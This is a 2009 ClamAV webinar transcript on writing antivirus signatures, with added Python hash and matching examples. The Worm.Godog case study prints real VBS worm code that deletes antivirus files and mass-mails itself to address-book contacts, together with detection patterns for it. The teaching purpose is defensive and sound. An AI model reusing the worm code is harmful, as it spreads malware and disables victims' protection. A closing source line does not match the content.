webinar alain-2009-03-04-clamav
DESCRIPTION
How to create signatures with the ClamAV open source antivirus
TRANSCRIPT
Writing ClamAV Signatures
Alain Zidouemba
March 4, 2009
About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:
  • Malware research & signature generation – ClamAV
  • Vulnerability research & rule generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q & A
ClamAV
What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon (clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates (freshclam)
• Sigtool – more later
Where can I get ClamAV from?
Latest stable release (as of March 2009): ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available at our website:
• http://clamav.net/download/packages
Why learn how to write sigs?
I thought Sourcefire released signature updates several times a day!
ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focused on recognizing malicious code in a file
Not intended to replace desktop AV
First line of defense
ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files:
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display detailed information on CVD files:
Various signature files in .cvd archive
Writing signatures for ClamAV
Hash database: *.hdb
The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5 option of sigtool:
Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
MD5, PE-section based: *.mdb
The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files and then run sigtool with the --mdb option:
Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
Case study: Trojan.Bagle-328 (cont'd)
Themida is used by malware writers... but also by legitimate products, so a signature on the packer code would be a likely false positive
We can use pe-sig, a Ruby script that creates a signature for each section of a PE file:
Finally, the signature is:• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
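As an added example (not sigtool and not the pe-sig script from the slides), the following Python reproduces both hash formats by hand: hdb_line() emits the MD5:Size:MalwareName line that sigtool --md5 prints for a file, and mdb_lines() walks the PE section table and emits one PESectionSize:MD5:MalwareName line per section, which is what sigtool --mdb gives for each extracted section. The PE image it hashes is produced by build_toy_pe(), a constructed stand-in rather than the Bagle sample; the section names and bytes are assumptions.

```python
"""Produce ClamAV .hdb (whole-file MD5) and .mdb (PE-section MD5) lines.

Added example for these slides; it is neither ClamAV's sigtool nor the VRT
pe-sig script, but reproduces what `sigtool --md5 <file>` and
`sigtool --mdb <section-file>` print, so the two formats can be compared.
The PE image built by build_toy_pe() is constructed here and is not malware.
"""
import hashlib
import struct


def hdb_line(data: bytes, name: str) -> str:
    """.hdb entry, MD5:Size:MalwareName, over the whole file."""
    return f"{hashlib.md5(data).hexdigest()}:{len(data)}:{name}"


def pe_sections(data: bytes):
    """Yield (name, raw_bytes) for every section header of a PE file.

    Reads only what is needed: e_lfanew, NumberOfSections, SizeOfOptionalHeader
    and each IMAGE_SECTION_HEADER's SizeOfRawData / PointerToRawData.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    first = coff + 20 + opt_size
    for i in range(nsections):
        hdr = data[first + 40 * i:first + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        yield name, data[raw_ptr:raw_ptr + raw_size]


def mdb_lines(data: bytes, name: str) -> list:
    """.mdb entries, PESectionSize:MD5:MalwareName, one per non-empty section.

    A section hash survives changes elsewhere in the file (other sections,
    overlay, header timestamps), which a whole-file .hdb hash does not.
    """
    return [f"{len(raw)}:{hashlib.md5(raw).hexdigest()}:{name}"
            for _, raw in pe_sections(data) if raw]


def build_toy_pe(sections) -> bytes:
    """Constructed minimal PE32 image: headers padded to 0x200, then the raw
    section data back to back. sections: list of (name, raw_bytes)."""
    hdr_size = 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)          # PE32 magic, rest zero
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    sect_hdrs, body, ptr = b"", b"", hdr_size
    for i, (name, raw) in enumerate(sections):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # relocs/linenumbers (unused), Characteristics (code|exec|read)
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw),
                                 0x1000 * (i + 1), len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    headers = dos + b"PE\0\0" + coff + opt + sect_hdrs
    if len(headers) > hdr_size:
        raise ValueError("too many sections for the fixed header area")
    return headers.ljust(hdr_size, b"\0") + body


# Constructed sample sections: a small x86 prologue/epilogue and some data.
TEXT_SECTION = bytes.fromhex("558bec83ec1033c0c9c3") + b"\xcc" * 22
DATA_SECTION = b"Legion Game\0" + b"\0" * 20

if __name__ == "__main__":
    sample = build_toy_pe([(".text", TEXT_SECTION), (".data", DATA_SECTION)])
    repacked = build_toy_pe([(".text", TEXT_SECTION), (".data", b"X" * 32)])
    print(hdb_line(sample, "Test.Hdb"))
    print(hdb_line(repacked, "Test.Hdb"))          # differs: one section changed
    print(*mdb_lines(sample, "Test.Mdb"), sep="\n")
    print(*mdb_lines(repacked, "Test.Mdb"), sep="\n")  # .text line is identical
```

Run as a script it prints two .hdb lines that differ (only the .data bytes changed) next to .mdb lines whose .text entry is identical in both builds, which is the property the Bagle case study relies on: a hash of one section keeps matching while the rest of the file is rebuilt.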
Extended sig. format: *.ndb
The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature
• TargetType is one of the following numbers specifying the type of the target file:
  0: Any file
  1: Portable Executable
  2: OLE2 component (eg: VBA script)
  3: HTML (normalized)
  4: Mail file
  5: Graphics
  6: ELF
  7: ASCII text file (normalized)
Case study: Trojan.Exchanger
Many samples that are very similar, yet not byte-identical
Case study: Trojan.Exchanger (cont’d)
5.exe:
Opcode:
• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
7.exe:
Opcode:
• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe (the 4-byte immediate of the add instruction is replaced by the {4} wildcard):
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont’d)
Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
Case study: Trojan.Exchanger (cont’d)
Finally we can rewrite the signature to be:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even matches other samples:
Logical signatures: *.ldb
Logical signatures were introduced in ClamAV 0.94
The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
Case study: Worm.Godog (cont’d)
After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
Case study: Worm.Godog (cont’d)
The worm also sends itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")
Case study: Worm.Godog (cont’d)
A signature to detect this mass-mailing portion of the file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
Finally, we can write this highly flexible signature:
• Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)
in a .ldb file (a single line; the sub-signature bodies are the five hex strings above, in order):
Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
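To see how the Trojan.Exchanger (.ndb) and Worm.Godog (.ldb) case studies behave as matchers, here is an added Python example (not ClamAV's engine) that compiles the hex bodies above into regular expressions, applies the .ndb offset rules (`*` versus EP+229) and evaluates the .ldb logical expression over per-sub-signature hits. The three Trojan.Exchanger signatures and the five Worm.Godog sub-signatures are copied from the slides; the byte buffers they are run against (toy_sample(), AV_KILL, MAILER) and the entry-point offset EP are constructed stand-ins, the sample VBS is already lower-cased to mimic normalization, and the "& binds tighter than |" precedence in eval_logic() is an assumption (the slide's expression is fully parenthesised, so it does not depend on it).

```python
"""Match ClamAV-style .ndb and .ldb signatures against byte buffers.

Added example (not ClamAV's matcher): the body syntax used on these slides
({n} exact skip, {-n} up to n bytes, {n-} at least n, {n-m}), the EP+n offset
of .ndb entries and the (A|B)&C logical expression of .ldb entries. Hex bodies
are the ones from the slides; the buffers and entry-point offset they are
matched against are constructed here.
"""
import re

def body_to_regex(body: str):
    """Translate a ClamAV hex body into a compiled bytes regex."""
    toks = re.findall(r"\{[^}]*\}|[0-9a-fA-F]{2}", body)
    if "".join(toks) != body:
        raise ValueError(f"unsupported token in body: {body!r}")
    out = []
    for tok in toks:
        if tok.startswith("{"):
            lo, dash, hi = tok[1:-1].partition("-")
            if not dash:                                 # {n}: exactly n bytes
                out.append(b".{%d}" % int(lo))
            else:                                        # {-n} / {n-} / {n-m}
                out.append(b".{%s,%s}" % (lo.encode() or b"0", hi.encode()))
        else:
            out.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(out), re.DOTALL)

def match_ndb(sig: str, data: bytes, entry_point=None) -> bool:
    """sig = MalwareName:TargetType:Offset:HexSignature; Offset is '*', a decimal
    file offset or EP+n / EP-n (EP = file offset of the entry point, which ClamAV
    reads from the PE header). TargetType is not enforced in this example."""
    _name, _target, offset, body = sig.split(":", 3)
    rx = body_to_regex(body)
    if offset == "*":
        return rx.search(data) is not None
    if offset.startswith("EP"):                          # int("+229") == 229
        pos = -1 if entry_point is None else entry_point + int(offset[2:])
    else:
        pos = int(offset)
    return 0 <= pos <= len(data) and rx.match(data, pos) is not None

def eval_logic(expr: str, hits) -> bool:
    """Evaluate an .ldb LogicalExpression (digits, (), |, &) over per-subsig hit
    flags by recursive descent; & binds tighter than | (assumption; the slide's
    expression is fully parenthesised). Count forms such as 0>5 are not handled."""
    toks, pos = re.findall(r"\d+|[()|&]", expr), 0

    def atom():
        nonlocal pos
        tok, pos = toks[pos], pos + 1
        if tok != "(":
            return hits[int(tok)]
        val = or_expr()
        if pos >= len(toks) or toks[pos] != ")":
            raise ValueError("unbalanced parentheses in " + expr)
        pos += 1
        return val

    def chain(op, sub):                                  # left-assoc run of `op`
        nonlocal pos
        val = sub()
        while pos < len(toks) and toks[pos] == op:
            pos += 1
            val = (sub() and val) if op == "&" else (sub() or val)
        return val

    and_expr = lambda: chain("&", atom)
    or_expr = lambda: chain("|", and_expr)
    result = or_expr()
    if pos != len(toks):
        raise ValueError("trailing tokens in " + expr)
    return result

def match_ldb(sig: str, data: bytes) -> bool:
    """sig = Name;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;..."""
    _name, _tdb, expr, *subsigs = sig.split(";")
    hits = [body_to_regex(s).search(data) is not None for s in subsigs]
    return eval_logic(expr, hits)

# Trojan.Exchanger (.ndb): the three signatures from the slides.
SIG_5EXE = "Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4"
SIG_ANY = "Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
SIG_EP = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
EP = 0x200  # constructed: file offset of the entry point in toy_sample() buffers

def toy_sample(imm32: str, gap: int = 229) -> bytes:
    """Constructed stand-in for 5.exe / 7.exe: filler, then the call/add/loop run
    `gap` bytes past the entry point, with the variable add-immediate `imm32`."""
    code = bytes.fromhex("e81c000000e8e6ffffff81c3" + imm32 + "e8dbffffffe846ffffffe2e4")
    return b"\x90" * EP + b"\xcc" * gap + code + b"\x00" * 64

# Worm.Godog (.ldb): sub-signatures (0)-(4) and the expression from the slides.
GODOG_SUBSIGS = [
    "66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c",
    "66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f",
    "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c",
    "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e",
    "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64",
]
GODOG_SIG = ";".join(["Worm.Godog", "Target:0", "((0|1|2|3)&(4))", *GODOG_SUBSIGS])

# Constructed, already lower-cased (normalized) VBS fragments standing in for the worm.
AV_KILL = (b'if fileexists (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\avp32.exe") then\n'
           b'legions.deletefile (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\*.*")\n')
MAILER = (b'for a = 1 to mail.addresslists.count\nset b = mail.addresslists (a)\n'
          b'for d = 1 to b.addressentries.count\ne = b.addressentries (counter)\n'
          b'c.recipients.add e\ncounter = counter + 1\nif counter > 8000 then exit for\nnext\n'
          b'c.attachments.add "c:\\legion.vbs"\nc.send\n')
```

The EP+229 form is the sharper of the two: the same byte sequence placed 230 bytes past the entry point still satisfies the `*` signature but no longer satisfies the EP-relative one, and the .ldb entry only fires when an AV-kill fragment and the mailer fragment are both present in the same file, which is exactly what ((0|1|2|3)&(4)) asks for.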
Whitelisting
To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format:
• MD5:FileSize:Comment
Whitelisting (cont’d)
To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
More questions?
[email protected] – user questions
[email protected] – technical discussions
Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net
If you have questions or comments on this presentation: [email protected]
ClamAV/VRT/Sourcefire
Websites
• http://www.clamav.net
• http://www.snort.org
• http://www.sourcefire.com
Blogs
• http://clam-av.blogspot.com
• http://vrt-sourcefire.blogspot.com
Contribute
Sample submission• http://www.clamav.net/sendvirus/
Upload statistics:• freshclam --submit-stats
Bug submission• http://bugs.clamav.net
Q & A
NOW GO AND WRITE SIGNATURES!
Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714